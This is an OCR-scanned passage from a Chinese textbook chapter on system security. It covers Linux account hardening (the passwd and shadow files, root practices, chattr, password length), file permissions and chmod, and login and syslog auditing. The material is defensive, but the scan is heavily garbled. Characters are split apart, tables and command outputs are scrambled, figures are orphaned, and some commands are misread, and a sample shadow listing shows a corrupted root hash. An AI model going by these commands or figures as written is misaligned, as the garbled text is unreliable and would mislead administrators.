及 时 查看 日 志 ， 可 以 了 解 系统 在 哪些 方面 存在 安全 隐患 ， 从 而 采取 相应 的 措施 将 系统 的 不 
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安全 因素 降 到 最 低 。 


常规 | 征 直 器 
显示 名 称 四 ) 
日 志 名 称 :|C: WWINDOYS\Systen32\config\SecEvent. Evt 
大 小 : 54.0 三 (65,536 字 节 ) 
创建 时 间 2007 年 11 月 6 日 16:02:45 
修改 时 间 : 2007 年 11 月 6 日 16:02:45 
访问 时 间 2008 年 2 月 22 日 11:43:52 
日 老大 小 


最 大 日 志文 件 大 小 旭 ; 512 入 二 


当 达 到 最 大 的 日 志 大 小 时 : 


人 〇 按 需 要 改写 事件 @) 
加 改写 和 于 中 


° ig, 


口 俩 用 斧 带 连接 如 


图 7-30 日 志文 件 属性 
7.3 Linux 安全 技术 


Linux 是 一 个 开放 式 系统 。 一 方面 ，Linux 系统 的 开放 特性 使 得 它 能 从 研发 者 那里 获 益 
良 多 ， 它 可 以 得 到 更 多 有 关 安 全 漏洞 的 信息 和 建议 ， 而 不 至 像 一 些 只 考虑 经 济 利益 的 开发 
商 那 样 对 安全 问题 漠不关心 ; 另 一 方面 ，Linux 又 是 自己 成 功 的 牺牲 者 ， 它 可 以 运行 大 量 的 
开放 性 应 用 程序 ， 这 既 方 便 了 用 户 ， 却 也 方便 了 黑客 ， 因 为 黑客 很 容易 就 能 找到 程序 和 工 
具 来 潜入 Linux 系统 、 盗 取 Linux 系统 上 的 重要 信息 。 因 此 ， 我 们 对 Linux 系统 的 安全 问 
题 也 要 足够 重视 ， 我 们 要 仔细 地 设 定 Linux 的 各 种 系统 功能 ， 并 且 加 上 必要 的 安全 措施 ， 
使 黑客 无 可 乘 之 机 。 


7.3.1 帐号 安全 


帐号 安全 属于 Linux 系统 安全 的 “外 层 ”安全 。 防 护 的 基本 目标 是 确保 用 户 名 /口令 能 
够 保护 系统 。 


1. Linux 用 户 登 录 过 程 


与 Windows 系统 一 样 ， Linux 系统 同样 通过 用 户 ID 和 口令 的 方式 来 登录 系统 。 通 过 终 
端 登录 Linux 的 过 程 描述 如 下 。 

(1) init fork 一 个 新 的 进程 ， 调 用 执行 /sbin/getty。 

(2) getty 在 终端 上 输出 一 条 欢迎 信息 ， 并 提示 输入 用 户 名 。 

(3) 用 户 输入 用 户 名 后 ，getty 读 取 用 户 名 ， 最 后 调用 执行 /bin/login。 
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(4) login 得 到 作为 参数 传 入 的 用 户 名 后 ， 提 示 输 入 口令 通知 。 
(5) login 读 取 口令 后 ， 与 /etc/passwd 口令 文件 匹配 ， 若 匹配 不 成 功 ， 则 中 断 整 个 登录 
进程 。 若 匹配 成 功 ， 则 根据 /etc/passwd 文件 中 的 定义 加 载 shell 环境 。 


2. Linux 主要 帐号 管理 文件 


在 Linux 系统 中 ， 用 户 帐号 的 基本 信息 存放 在 文件 etc/passwd 中 ， 每 个 用 户 的 信息 在 
此 文件 中 占 一 行 、 由 7 个 域 组 成 ， 具 体 结构 如 下 所 示 。 


Name:coded-passwd:UID:GID:user-Info:home-dIrectory:shell 


7 个 域 中 的 每 一 个 域 由 冒号 隔 开 。 空 格 是 不 允许 的 ， 除 非 在 userInfo 域 中 使 用 。 下 面 
总 结 了 每 个 域 的 含义 。 
。 ”Name: 给 用 户 分 配 的 用 户 名 ， 这 不 是 私有 信息 。 
e@ ”coded-passwd: 经 过 加 密 的 用 户口 令 。 如 果 一 个 系统 管理 员 需 要 阻止 一 个 用 户 登 
录 , 则 经 常用 一 个 星 号 ( : * : ) 代 替 。 该 域 通常 不 手工 编辑 。 用 户 应 该 使 用 pa-sswd 
命令 修改 他 们 的 口令 。 如 果 该 域 显示 的 是 一 个 “x”， 则 表示 密码 已 被 映射 到 
/etc/shadow 文件 中 ， 并 不 保存 在 etc/passwd 文件 中 ， 这 是 出 于 安全 性 的 考虑 。 
。 UID: 用 户 的 唯一 标识 号 。 习 惯 上 ， 小 于 100 的 UID 是 为 系统 帐号 保留 的 。 
。 ”GID: 用 户 所属 的 基本 分 组 .通常 它 将 决定 用 户 创建 文件 的 分 组 拥有 权 。 在 Red Hat 
Linux 中 ， 每 个 用 户 帐号 被 默认 赋予 一 个 唯一 分 组 。 
。 “user-info: 对 用 户 的 一 些 解释 说 明 ， 这 是 可 选 的 ， 习 惯 上 它 包括 用 户 的 全 名 。 
。 home-directory: 该 域 指明 用 户 的 起 始 目录 , 它 是 用 户 登 录 进 入 后 的 初始 工作 目录 。 
。 ”shell: 该 域 指明 用 户 登录 后 执行 的 命令 解释 器 所 在 的 路 径 。 有 好 几 种 流行 的 Shell， 
包括 Bourne Shell (/bin/sh)、C Shell (/bin/csh)、Korn Shell (/bin/ksh) 和 Bash Shell( / 
bin/bash)。 可 以 为 用 户 在 该 域 中 赋 一 个 /bin/false 值 ， 这 将 阻止 用 户 登录 。 
如 下 面 的 etc/passwd 条 目 ， 其 指出 用 户 zhaozhenzhou 的 用 户 名 为 zhouzhou， 密 码 被 映射 
到 etc/shadow 文 件 中 ，UID 为 513，GID 为 100， 起 始 目 录 为 /home/zhouzhou， 把 Bash Shell 作 
为 缺 省 。 


zhouzhou:x:513:100:zhaozhenzhou: /home/zhouzhou: /bin/bash 


为 了 提高 用 户 密码 存放 的 安全 性 , 现在 的 Linux 系统 普遍 使 用 了 shadow 技术 ,将 加 密 
后 的 密码 存放 在 /etc/shadow 文件 中 ， 而 /etc/passwd 文件 中 的 密码 域 只 保存 一 个 “x”。 
/etc/shadow 文件 的 每 行内 容 包括 九 个 字段 ， 相 邻 字 段 之 间 用 冒号 分 隔 。 
e ”用 户 名 。 
加 密 口 令 。 
上 一 次 修改 口令 的 日 期 以 从 1970 年 1 月 1 日 开始 的 天 数 表示 。 
口令 在 两 次 修改 间 的 最 小 天 数 ， 即 口令 在 建立 后 必须 更 改 的 天 数 。 
口令 更 改 之 前 向 用 户 发 出 警告 的 天 数 。 
口令 终止 后 帐号 被 禁用 的 天 数 。 
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。 ”自从 1970 年 1 月 1 日 起 帐号 被 禁用 的 天 数 。 
。 ”保留 域 。 
图 7-31 是 一 个 Red Hat Linux 系统 中 /etc/shadow 文 件 的 例子 。 


00t: 1SmDLORIVEV SBTdiT/6RMIqTcLGc 1/: 13950:0:99999:7::: 
in:*:13950:0:99999:7::: 

aenon:*:13950:0:99999:7::: 

dm *:13950:0:99999:7::: 

lp:*:13950:0:99999:7::: 

ync:*:13950:0:99999:7::: 

hutdown:*:13950:0:99999:7::: 

alt:*:13950:0:99999:7::: 

il:*:13950:0:99999:7::: 

ews :站 :13950:0:99999:7::: 

ucp:*:13950:0:99999:7::: 

perator:*:13950:0:99999:7::: 

anes:*:13950:0:99999:7::: 
opher :*:13950:0:99999:7::: 
tp:#:13950:0:99999:7::: 
obody:*#:13950:0:99999:7::: 
pm !!:13950:0:99999:7: 
csa:!!:13950:0:99999:7 
scd:!1!:13950:0:99999:7 
shd:11:13950:0:99999:7::: 
pe:!!:13950:0:99999:7::: 
pcuser:!!:13950:0:99999:7::: 
snobody: !!:13950:0:99999:7::: 
shadow”[ 只 读 ][ 已 转换 】]51L，1505C 


7-31 /etc/shadow 文件 


Shadow 文件 对 于 一 般 用 户 是 不 可 读 的 ， 只 有 超级 用 户 (Roob 才 可 以 读 。 这 样 ， 对 一 般 
用 户 就 无 法 得 到 加 密 后 的 口令 ， 提 高 了 系统 的 安全 性 。 

上 述 这 两 个 于 用 户 和 密码 相关 的 配置 文件 是 不 能 直接 修改 的 ， 必 须 通过 相应 的 命令 才 
能 进行 更 改 。passwd 和 chage 是 专门 用 于 实现 密码 安全 策略 的 两 个 命令 ， 有 具体 使 用 方法 在 
此 不 做 介绍 ， 请 读者 查询 帮助 自学 。 

3. 帐号 /口令 安全 设置 


1) “默认 帐号 

所 有 的 Linux 系统 都 有 一 些 默认 帐号 ， 如 果 这 些 帐 号 是 用 户 所 不 需要 的 ， 建 议 把 它们 
禁用 或 删除 。 因 为 系统 中 的 帐号 越 多 ， 被 攻击 的 可 能 性 就 越 大 。 

我 们 可 以 在 etc/passwd 文 件 的 口令 域 中 前 加 一 个 “* ”来 达到 禁用 帐户 的 目的 。 删 除 
帐号 可 以 使 用 userdel 命令 。 

2) root 帐号 

root 帐号 是 Linux 系统 中 享有 特权 的 帐号 ， 其 不 受 任何 限制 和 制约 。 系 统管 理 员 在 以 
root 或 超级 用 户 进行 操作 时 ， 要 注意 以 下 规则 。 

。 除非 必要 ， 避 免 以 超级 用 户 登 录 。 


3) 
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如 果 必 须 以 root 操作 ， 首 先 以 自己 身份 登录 ， 然 后 使 用 /bin/su -来 成 为 root。 

不 要 随意 地 把 root shell 留 在 终端 上 。 

不 要 把 root 口令 给 不 信任 的 人 或 不 是 十 分 需要 的 人 。 

如 果 某 人 确实 需要 以 root 来 运行 命令 , 则 考虑 安装 并 使 用 sudo 这 样 的 工具 , 它 能 
使 普通 用 户 以 root 来 运行 个 人 命令 并 维护 日 志 。 

永远 不 要 把 当前 目录 (“,”) 放 到 root 帐号 的 搜索 路 径 中 。 

不 要 把 普通 用 户 的 bin 目录 放 到 root 的 搜索 路 径 中 。 

不 要 使 任何 人 作为 超级 用 户 在 别人 不 注意 的 情况 下 执行 特洛伊 木马 程序 。 

永远 不 以 root 运行 其 他 用 户 的 或 不 熟悉 的 程序 。 

当 使 用 su 命令 成 为 超级 用 户 时 ， 用 全 路 径 名 / bin/ su 来 调用 ， 而 不 是 su， 这 是 为 
了 防止 一 个 特洛伊 木马 su 程序 被 用 来 偷窃 root 口令 。 最 好 是 使 用 /bin/su- 形 式 , 额 
外 的 “-” 保 证 以 有 效 的 用 户 ID 要 求 切换 到 root 环境 中 。 

下 令 文件 


不 可 改变 位 可 以 用 来 保护 文件 ， 使 其 不 被 意外 地 删除 或 重 写 ， 也 可 以 防止 有 些 人 创建 


这 个 文件 的 符号 连接 。 删除 “/etc/passwd”、“/etc/shadow”、“/etc/group” 或 “/etc/gshadow” 
都 是 黑客 的 攻击 方法 。 


为 口令 文件 和 组 文件 设置 不 可 改变 位 ， 可 以 用 下 列 命令 。 


[root@userl]#chattr +i /etc/passwd 
[root@userl]#chattr +i /etc/shadow 
[root@userl]#chattr +i /etc/group 

[root@userl]#chattr +i /etc/gshadow 


注意 : 如 果 将 来 要 在 口令 或 组 文件 中 增加 或 删除 用 户 ， 就 必须 先 清除 这 些 文件 的 不 可 改变 
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位 ， 否 则 就 不 能 做 任何 改变 。 
口令 长 度 


Linux 系统 默认 最 短 口 令 长 度 为 5 个 字符 , 这 个 长 度 不 足以 保证 口令 的 健壮 性 , 应 该 改 


为 最 短 8 个 字符 ， 编 辑 /etc/login.defs 文件 ， 在 此 文件 中 ， 将 


PASS MIN LEN 5 改 为 : PASS MIN LEN 8 


7.3.2 文件 系统 安全 


文件 系统 安全 是 Linux 系统 安全 的 核心 Linux 文件 系统 控制 谁 能 访问 信息 以 及 他 们 能 
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做 些 什么 。 即 使 外 层 帐 号 安全 被 突破 ， 攻 击 者 也 必须 击败 文件 系统 根据 文件 拥有 权 和 权限 
而 精心 设置 的 防御 措施 。 


文件 系统 结构 


为 了 维护 Linux 文件 系统 的 安全 ， 我 们 首先 介绍 一 下 Linux 的 文件 系统 结构 。 不 同 版 


本 的 Linux 文件 系统 结构 大 致 相同 ， 基 本 上 所 有 的 Linux 系统 都 包括 如 表 7-11 所 示 的 目录 
结构 。 
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表 7-11 Linux 目录 结构 


目录 内 容 

/bin 用 户 命令 的 可 执行 文件 (二 进 制 ) 

/dev 特殊 设备 文件 

/etc 系统 执行 文件 ， 配 置 文 件 ， 管 理 文件 ， Red Hat Linux 中 为 配置 文件 保留 ( 非 二 进 制 ) 

/home 用 户 起 始 目录 (Wu、Ausers、/Users 是 可 选择 的 ) 

/lib 引导 系统 以 及 在 root 文件 系统 中 运行 命令 所 需 的 共享 库 文件 

/lost+found 与 特定 文件 系统 断 开 连 接 的 丢失 文件 

/mnt 临时 安装 的 文件 系统 (如 软驱 ，CD-ROM 等 ) 

as 一 个 伪 文 件 系统 ， 用 来 作为 到 内 核 数据 结构 或 正在 运行 的 进程 的 接口 (对 调试 很 有 
用 ) 

/sbin 只 被 root 使 用 的 可 执行 文件 以 及 那些 只 需要 引导 或 安装 /usr 的 文件 保留 

/tmp 临时 文件 

Wh 用 户 和 系统 命令 使 用 的 可 执行 文件 、 头 文件 、 共 享 库 、 帮 助 文件 、 本 地 程序 (在 
/usr/local 中 ) 

/var 用 于 电子 邮件 、 打 印 、cron 等 的 文件 ， 统 计 文 件 ， 日 志文 件 

2. 文件 权限 


文件 权限 是 Linux 文件 系统 安全 的 关键 。 Linux 是 一 个 多 用 户 系统 , 它 用 划分 的 方式 来 
控制 文件 访问 : 每 个 文件 属于 一 个 特定 用 户 和 分 组 ， 用 户 和 分 组 对 文件 或 目录 的 访问 是 通 
过 权限 来 控制 的 。 

每 个 文件 和 目录 有 三 组 权限 与 之 相关 : 一 组 为 文件 的 拥有 者 (owner)， 一 组 为 文件 所 属 
分 组 的 成 员 (group)， 一 组 为 其 他 所 有 用 户 (others)。 

每 组 权限 有 三 个 权限 标志 位 来 控制 以 下 权限 。 

。 ”可 读 (@): 如 果 被 设置 ， 则 文件 或 目录 可 读 。 

。 ”可 写 (w): 如 果 被 设置 ， 文 件 或 目录 可 以 被 写 入 或 修改 。 

e 可 执行 9): 如 果 被 设置 ， 文 件 或 目录 可 以 被 执行 和 搜索 。 

如 图 7-32 所 示 ， 每 个 文件 或 目录 有 9 个 权限 位 。 

rWXIr-X --- 


一 一 一 一 -一 


| 
其 他 用 户 访问 权 


分 组 访问 权 
拥有 者 访问 权 
7-32 ”Linux 权限 位 
我 们 可 以 使 用 ls -1 命令 查看 当前 位 置 下 文件 和 目录 的 权限 。 比 如 : 


$ 1s = 下 


册 U EPEE 
-ITWXIT-X--- 1 david hackers 15 Feb 25 16:00 mbox 


-Iwxr-x--- 中 的 第 一 个 字符 “-” 表 示 mbox 文件 是 一 个 普通 文件 (与 目录 文件 相对 应 ， 目 
录 文 件 用 “d” 表 示 )， 后 9 个 字符 是 mbox 文件 的 权限 位 ， 说 明了 对 于 mbox 文件 ,文件 的 
拥有 者 david 具有 可 读 、 可 写 、 可 执行 权限 (rwx), 用 户 组 hackers 具有 可 读 、 可 执行 权限 (r-x)， 
其 他 用 户 什 么 权限 都 没有 (---)。 

权限 位 还 可 以 用 一 个 八进制 数 来 表示 。 把 9 个 模式 位 分 为 三 组 ， 每 组 三 位 ， 一 位 为 拥 
有 者 ， 一 位 为 分 组 ， 一 位 为 其 他 用 户 ， 然 后 加 上 表 7-12 所 示 的 数值 。 


表 7-12 八进制 权限 值 


权 限 其 他 用 户 
可 读 4 
可 写 2 
可 执行 1 
无 0 


例如 ， 为 一 个 文件 的 拥有 者 授予 可 读 和 可 写 权 限 ， 给 分 组 和 其 他 用 户 只 有 可 读 权限 ， 
其 权限 位 为 rw -r- - f- -。 它 可 以 写成 一 个 八进制 数 一 一 “绝对 模式 ”。 这 个 数 等 于 把 表 中 
的 数字 相 加 。 

Mode=owner (read) +owner (write) +group (read) +others (read) 


Mode=400+200+40+4 
Mode=644 


3. chmod 命令 


用 户 可 以 使 用 chmod 命令 来 改变 文件 的 权限 设置 。 该 命令 有 两 个 变 元 : perm 是 为 文件 
设置 的 权限 ， files 是 文件 的 名 字 。 如 果 要 同时 改变 目录 内 的 所 有 文件 和 子 目录 权限 ， 则 应 
该 加 -R 参数 。chmod 命令 只 能 由 文件 拥有 者 或 root 运行 。 

权限 变 元 可 以 指明 为 绝对 或 符号 模式 。 使 用 绝对 模式 时 ， 命 令 chmod 666 myfiles 把 
my files 的 权限 设 为 Tw-Tw-Iw-。 

符号 方式 说 起 来 稍微 有 些 复杂 ， 但 更 容易 理解 。 其 变 元 由 三 部 分 组 成 ， 如 下 所 示 。 


who op permission 


。 ”who 是 一 个 用 户 (u)、 分 组 (g)、 其 他 (0) 或 者 所 有 (a 或 ug o)。 

e。 op 是 “+”、“-” 或 “=” 之 一 。“+” 使 得 选择 的 权限 添加 到 文件 已 存在 的 权限 
中 ，“-” 把 其 删除 ，“=” 使 文件 只 能 拥有 这 些 权限 。 

。 ”permission 是 可 读 (r?)、 可 写 (w) 和 可 执行 (x) 的 任 一 组 合 。 

如 果 who 被 去 掉 ， 则 假设 是 “a”。 

如 果 要 给 文件 foo 的 分 组 以 读 权限 ， 则 使 用 如 下 命令 : 


$ chmod g+r foo 


与 权限 控制 相关 的 命令 还 有 chown( 改 变 拥有 权 )、chgrp( 改 变 分 组 ) 和 umask( 默 认 权 限 
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分 配 )， 在 此 不 作 介绍 。 


7.3.3 Linux 日 志 系 统 


记录 重要 的 系统 事件 是 系统 安全 的 一 个 重要 因素 .Linux 维护 了 几 个 基本 的 日 志文 件 来 
跟踪 和 记录 系统 中 发 生 了 什么 事情 ， 包 括 谁 登录 进入 ， 谁 退出 登录 ， 以 及 他 们 做 了 些 什 么 。 
日 志文 件 对 于 维护 系统 安全 很 重要 。 它 们 为 两 个 重要 功能 审计 、 监 测 并 提供 数据 。 它 们 通 
过 提供 一 个 历史 记录 (系统 中 关于 活动 的 审计 轨迹 ) 允 许 用 户 或 第 三 方 回 头 来 系统 地 评价 安 
全 程序 的 效率 以 及 确定 引起 安全 破坏 或 系统 功能 失效 的 原因 。 如 果 需 要 ， 它 们 还 能 作为 呈 
现 给 权威 机 构 的 证 据 。 它们 还 能 用 来 “实时 ?地 监测 系统 状态 , 检测 和 追踪 侵入 者 , 发 现 bug 
以 及 阻止 问题 发 生 。 

1. 日 志 子 系统 

在 Linux 系统 中 ， 有 三 个 主要 的 日 志 子 系统 。 

e ”连接 时 间 日 志 系 统 : 由 多 个 程序 执行 , 把 记录 写 入 到 /var/log/wtmp 和 /varrun/utmp。 
login 等 程序 更 新 wtmp 和 utmp 文件 ， 使 系统 管理 员 能 够 跟踪 谁 在 何 时 登录 到 
系统 。 

。 ”进程 统计 系统 .由 系统 内 核 执 行 。 当 一 个 进程 终止 时 ， 为 每 个 进程 向 进程 统计 文 
件 (pacct 或 acct) 中 写 一 个 记录 。 进 程 统计 的 目的 是 为 系统 中 的 基本 服务 提供 命令 
使 用 统计 。 

e 错误 日 志 系统 : 由 syslogd 执行 。 各 种 系统 守护 进程 、 用 户 程序 和 内 核 通过 syslog 
向 文件 /var/log/messages 报告 值得 注意 的 事件 。 另 外 有 许多 Linux 程序 创建 日 志 。 
还 有 像 HTTP 和 FTP 这 样 提供 网 络 服务 的 服务 器 也 保持 详细 的 日 志 。 

多 数 Linux 系统 在 /var/log 中 保存 主要 的 日 志 。 常 用 的 日 志文 件 如 表 7-13 中 所 示 。 


表 7-13 常见 Linux 日 志文 件 


日 志文 件 目标 
access-log 记录 HTTP/web 的 传输 
acctpacct 记录 用 户 命令 
aculog 记录 调制 解 调 器 的 活动 
btmp 记录 失败 的 登录 
lastlog 记录 最 近 几 次 成 功 登录 的 时 间 和 最 后 一 次 不 成 功 的 登录 
messages 从 syslog 中 记录 信息 (通常 链接 到 syslog 文件 ) 
sudolog 记录 使 用 sudo 发 出 的 命令 
sulog 记录 su 命令 的 使 用 
syslog 从 syslog 中 记录 信息 (通常 链接 到 message 文 件 ) 
utmp 记录 当前 登录 的 每 个 用 户 
wtmp 一 个 用 户 每 次 登录 进入 和 退出 时 间 的 永久 记录 
xferlog 记录 FTP 会 话 
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2. 登录 记录 


utmp、wtmp 和 lastlog 日 志文 件 是 多 数 重要 Linux 日 志 子 系统 的 关键 一 一 保持 用 户 登录 
进入 和 退出 的 记录 。 有 关 当 前 登录 用 户 的 信息 记录 在 文件 utmp 中 ; 登录 进入 和 退出 记录 在 
文件 wtmp 中 ; 最 后 一 次 登录 在 文件 lastlog 中 。 数 据 交 换 、 关 机 和 重启 也 记录 在 wtmp 文 
件 中 。 所 有 的 记录 都 包含 时 间 戳 。 

这 些 文件 (除了 lastlog) 在 具有 大 量 用 户 的 繁忙 系统 中 增长 得 很 迅速 。 例 如 wtmp 文件 可 
以 无 限制 增长 ， 除 非 定期 进行 截取 。 许 多 系统 以 一 天 或 一 周 为 单位 把 wtmp 配置 成 循环 使 
用 。 它 通常 由 cron 运行 的 脚本 来 删改 。 这 些 脚本 重 命名 并 循环 使 用 wtmp 文件 ， 能 保持 一 
周 有 价 值 的 数据 。 通 常 ，wtmp 在 第 一 天 结束 后 重 命名 为 wtmp.1; 第 二 天 后 wtmp.1 变 为 
wtmp.2 等 ， 直 到 wtmp.7。 

如 果 /var/log/wtmp 文件 不 存在 ， 则 不 执行 登录 和 连接 时 间 统 计 ， 它 必须 手工 进行 创建 
(touch/var/log/wtmp)。 

每 次 有 一 个 用 户 登录 时 ，login 程序 在 文件 lastlog 中 查看 用 户 的 UID。 如 果 找 到 了 ， 则 
把 用 户 上 次 登录 、 退 出 时 间 和 主机 名 写 到 标准 输出 中 ， 然 后 login 程序 在 lastlog 中 记录 新 
的 登录 时 间 。 在 新 的 lastlog 记录 写 入 后 ，utmp 文件 打开 并 插入 用 户 的 utmp 记录 。 该 记录 

-直到 用 户 登 录 退 出 时 删除 。utmp 文件 被 各 种 命令 使 用 ， 包 括 who、w、users 和 finger。 

下 一 步 , login 程序 打开 文件 wtmp 附加 用 户 的 utmp 记录 。 当 用 户 登 录 退 出 时 ， 具 有 更 
新 时 间 蕉 的 同一 utmp 记录 附加 到 文件 中 。wtmp 文件 被 last 和 ac 命令 使 用 。 

1) who 命令 

who 命令 查询 utmp 文件 并 报告 当前 每 个 登录 的 用 户 。who 的 默认 输出 包括 用 户 名 、 终 
端 类 型 、 登 录 日 期 和 时 间 以 及 远程 主机 。 

$ who 
root ttyl May 15 16:09 
bob console May 15 14:49 


alice ttyp2 May 16 00:13 
carol ttyp3 May 11 13:20 


如 果 指 明了 wtmp 文件 名 ， 则 who 命令 查询 所 有 以 前 的 登录 。 命 令 who/var/log/wtmp 
将 报告 自从 wtmp 文件 创建 或 删改 以 来 的 每 一 次 登录 。 

2) vw 命令 

VW 命令 查询 utmp 文件 并 显示 当前 系统 中 每 个 用 户 和 他 所 运行 的 进程 信息 。 标 题 栏 显示 
当前 时 间 ， 系 统 已 运行 了 多 长 时 间 ， 当 前 有 多 少 用 户 登 录 以 及 过 去 1 分 钟 、5 分 钟 和 15 分 
钟 内 的 系统 平均 负载 。 


Sw 

3:55pm up 8 days, 2:40, 5 users, load average: 0.04, 0.06, 0.09 
User tty 1ogin@ idle  JCPU PCPU what 
carol pts/tl 2:16pm 18:09 -sh 

dave pts/t2 2:20pm 88:42 1 1 -sh 
trent pts/t3 1:07pm 8:18 nslookup 
mallory pts/t4 10:07pm 133:55 -sh 


alice pts/t5 1:50pm L 1 W 
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3) users 命令 


users 命令 用 单独 一 行 打印 出 当前 登录 的 用 户 ， 每 个 显示 的 用 户 名 对 应 一 个 登录 会 话 。 
如 果 一 个 用 户 有 不 止 一 个 登录 会 话 ， 那 他 的 用 户 名 将 显示 相同 的 次 数 。 


$ users 


alice carol dave bob 


4) last 命令 


last 命令 往 回 搜索 wtmp 来 显示 自从 文件 第 
型 和 日 期 。 输 出 可 能 很 元 长 ， 


$ last 

alice ttyp4 
ftp ftp 
caro1 ttyp5 
alice ftp 
bob ttyp4 
dave ftp 


如 果 指 明了 用 户 ， 那 么 last 只 


$ last carol 


carol pts/t6 
carol pts/t4 
carol pts/t5 
carol pts/t0 
carol pts/t0 
carol pts/t0 
carol pts/t0 
carol pts/t0 
carol pts/t4 
carol pts/t3 
5) ac 命令 


-次 创建 后 登录 过 的 用 户 。 它 还 报告 终端 类 


下 面 是 一 个 简短 的 例子 。 
Thu May 7 19:50 stil11 logged in 
Thu May 7 18:42 - 18:42 (00:00) 
Thu May 7 18:37 still] logged in 
Thu May 7 15:50 - 16:06 (00:15) 
Thu May 7 15:46 - 15:50 (00:03) 
Thu May 7 15:00 - 15:01 (00:01) 
报告 该 用 户 的 近期 活动 。 
Tue Apr 20 21:57 still logged in 
Tue Apr 20 21:16 stil1 logged in 
Tue Apr 20 18:03 sti11 logged in 
Mon Apr 19 15:17 - 15:26 (1+00:09) 
Fri Apr 16 16:44 - 18:25 (01:41) 
Fri Apr 16 14:12 - 16:12 (02:00) 
Thu Apr 15 11:05 - 18:33 (07:28) 
Wed Apr 14 22:16 - 01:52 (03:35) 
Tue Apr 13 22:07 - 21:15 (6+23:08) 
Tue Apr 13 13:03 - 17:30 (1+04:26) 


ac 命令 根据 当前 /varlog/wtmp 文件 中 的 登录 进入 和 退出 来 报告 用 户 连接 的 时 间 ( 小 时 )。 


剖 如 果 不 使 用 标志 ， 则 报告 
$ac 
立 total 136.25 
. $ac-d 
材 Mar 15 total 
Mar 16 total 
计 Mar 17 total 
算 Mar 18 total 
机 Mar 19 total 
系 Mar 20 total 
列 Mar 21 total 


告 总 的 时 间 。 


19.89 

4.52 
17.35 
29.26 
36.28 
11.42 
17.53 


“-d” 标 志 产 生 每 天 总 的 连接 时 间 。 


标志 报告 每 个 用 户 总 的 连接 时 间 。 


S$ ac -p 
mallory 
carol 
root 
eve 
alice 
bob 
total 


3. 进程 统计 


Linux 的 进程 统计 可 以 跟踪 每 个 用 户 运行 的 每 条 命令 ,用 以 了 解 用 户 的 历史 操作 或 跟踪 
入 侵 者 。 进 程 统计 默认 不 激活 ， 它 必须 启动 。 在 Linux 系统 中 启动 进程 统计 使 用 accton 命 


31.02 
41.08 
10.30 
29.11 
14.73 
10.01 
136.26 


山 UU 


令 ， 并 且 必 须 以 root 身份 来 运行 。 使 用 的 命令 格式 如 下 : 


accton /var/log/pact 


- 旦 accton 被 激活 ， 就 可 以 使 用 lastcomm 命令 监测 系统 中 任何 时 候 执行 的 命令 。 若 


要 关闭 统计 ， 可 不 带 任 何 参 数 来 运行 accton 命令 。 


lastcomm 命令 报告 以 前 执行 的 命令 。 不 带 变 元 时 ，lastcomm 命令 显示 当前 统计 文件 生 
命 周 期 内 记录 的 所 有 命令 的 有 关 人 信息， 包括 命 令 名 、 用 户 、tty、 命 令 花 费 的 CPU 时 间 和 时 


间 铃 。 如 下 所 示 : 


# lastcomm 


comsat 
ac 

Sa 

man 

sh 

more 
uuxqt 
uucico 
Sa 

Users 

w 5 
who 
sendmail 
procmail 
Uux 
procmail 
sendmail 
sh 
sendmail 
sh 


mmwmwmnm 


dave 
dave 
dave 
dave 
dave 
root 
root 
root 
root 
root 
root 
uucp 
uucp 
root 
dave 
dave 
dave 
1ist 
dave 
list 
list 
11st 
1ist 
1ist 
1ist 


4. syslog 设备 
系统 在 同一 时 间 会 发 生 许多 事情 ，Linux 系统 集成 了 syslog 设备 ， 用 以 对 各 种 设备 (发 
布 消息 的 子 系统 ) 进 行事 件 记 录 ， 实 现 了 日 志 
个 文件 或 设备 ， 或 给 用 户 发 送 一 个 信息 。syslog 除了 能 记录 本 地 事件 之 外 ， 还 能 通过 网 络 
记录 另 一 个 主机 上 的 事件 。 
syslog 设备 由 一 个 守护 进程 (/etc/syslogd) 组 成 ， 它 能 接收 访问 系统 的 日 志 信 息 ， 并 且 根 
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syslog 可 以 记录 系统 事件 ， 可 以 写 到 一 
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据 /etc/syslog.conf 配置 文件 中 的 syslog 记录 来 处 理 这 些 信息 。 一 个 典型 的 syslog 记录 包括 
生成 程序 的 名 字 和 一 个 文本 信息 。 它 还 包括 一 个 设备 (信息 来 源 ) 和 一 个 范围 从 info( 信 息 ) 到 
emerg( 紧 急 ) 的 优先 级 。 
每 个 syslog 消息 被 赋予 下 面 的 主要 设备 之 一 
。 LOG AUTH: 认证 系统 login、su、getty 等 。 
。 LOG AUTHPRIV: 同 LOG_AUTH, 但 只 登录 到 所 选择 的 单个 用 户 可 读 的 文件 中 。 
e LOG CRON: cron 守护 进程 。 
。 LOG DAEMON: 其 他 系统 守护 进程 ， 如 routed。 
。 LOG FTP: 文件 传输 协议 fpd、tftpd。 
。 LOG KERN: 内 核 产生 的 消息 。 
LOG LPR: 系统 打印 机 缓冲 池 lpr、lpd。 
LOG_MAIL: 电子 邮件 系统 。 
LOG NEWS: 网 络 新 闻 系 统 。 
LOG SYSLOG: 由 syslogd(8) 产 生 的 内 部 消息 。 
LOG_USER: 随机 用 户 进程 产生 的 消息 。 
LOG_UUCP: UUCP 子 系统 。 
LOG LOCAL0~LOG _ LOCAL7: 为 本 地 使 用 保留 。 
syslog 为 每 个 事件 赋予 几 个 不 同 的 优先 级 ， 分 别 是 下 面 几 种 。 
LOG_EMERG: 紧急 情况 。 
LOG_ALERT: 应 该 被 立即 改正 的 问题 ， 如 系统 数据 库 被 破坏 。 
LOG_CRIT: 重要 情况 ， 如 硬盘 错误 。 
LOG ERR: 错误 。 
LOG_WARNING: 警告 信息 。 
LOG NOTICE: 不 是 错误 情况 ， 但 是 可 能 需要 处 理 。 
LOG INFO: 情报 信息 。 
LOG_DEBUG: 包含 情报 的 信息 ， 通 常 只 在 调试 一 个 程序 时 使 用 。 
syslog.conf 文件 指明 syslogd 程序 记录 日 志 的 行为 ， 该 程序 在 启动 时 查询 配置 文件 。 该 
文件 由 不 同 程序 或 消息 分 类 的 单个 条 目 组 成 ， 每 个 占 一 行 ， 对 每 类 消息 提供 一 个 选择 域 和 
-个 动作 域 。 这 些 域 由 tab 符 隔 开 。 选 择 域 指明 消息 的 类 型 和 优先 级 ， 动 作 域 指明 syslogd 
接收 到 一 个 与 选择 标准 相 匹配 的 消息 时 所 执行 的 动作 。 每 个 选项 是 由 设备 和 优先 级 组 成 的 。 
当 指 明 一 个 优先 级 时 ,syslogd 将 记录 一 个 拥有 相同 或 更 高 优先 级 的 消息 。 所 以 如 果 指 明 crit， 
那 所 有 标 为 crit、alert 和 emerg 的 消息 将 被 记录 。 每 行 条 目的 行动 域 指明 当选 择 域 选择 了 一 
